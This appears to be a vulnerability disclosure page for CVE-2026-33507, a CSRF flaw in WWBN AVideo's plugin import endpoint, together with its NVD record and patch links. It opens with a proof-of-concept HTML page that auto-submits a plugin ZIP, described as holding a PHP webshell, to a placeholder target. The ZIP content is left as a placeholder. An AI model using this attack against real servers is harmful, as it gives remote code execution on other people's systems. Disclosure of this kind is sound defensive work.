CVE-2026-33507

<!-- CSRF PoC for CVE-2026-33507 --> <html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https://<TARGET_IP>/objects/pluginImport.json.php", true); xhr.setRequestHeader("Accept", "application/json"); // Construct multipart/form-data with a malicious ZIP plugin containing PHP webshell var formData = new FormData(); var blob = new Blob(["PK..."], {type: "application/zip"}); // Placeholder for ZIP content formData.append("files", blob, "exploit.zip"); xhr.send(formData); } window.onload = submitRequest; </script> </body> </html>

{"cve": {"id": "CVE-2026-33507", "sourceIdentifier": "[email protected]", "published": "2026-03-23T17:16:51.803", "lastModified": "2026-03-24T16:55:37.440", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `objects/pluginImport.json.php` endpoint allows admin users to upload and install plugin ZIP files containing executable PHP code, but lacks any CSRF protection. Combined with the application explicitly setting `session.cookie_samesite = 'None'` for HTTPS connections, an unauthenticated attacker can craft a page that, when visited by an authenticated admin, silently uploads a malicious plugin containing a PHP webshell, achieving Remote Code Execution on the server. Commit d1bc1695edd9ad4468a48cea0df6cd943a2635f3 contains a patch."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de video de código abierto. En versiones hasta la 26.0 inclusive, el endpoint `objects/pluginImport.json.php` permite a los usuarios administradores subir e instalar archivos ZIP de plugins que contienen código PHP ejecutable, pero carece de protección CSRF. Combinado con la aplicación que establece explícitamente `session.cookie_samesite = 'None'` para conexiones HTTPS, un atacante no autenticado puede crear una página que, cuando es visitada por un administrador autenticado, sube silenciosamente un plugin malicioso que contiene una webshell PHP, logrando la ejecución remota de código en el servidor. El commit d1bc1695edd9ad4468a48cea0df6cd943a2635f3 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/d1bc1695edd9ad4468a48cea0df6cd943a2635f3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-hv36-p4w4-6vmj", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-hv36-p4w4-6vmj", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}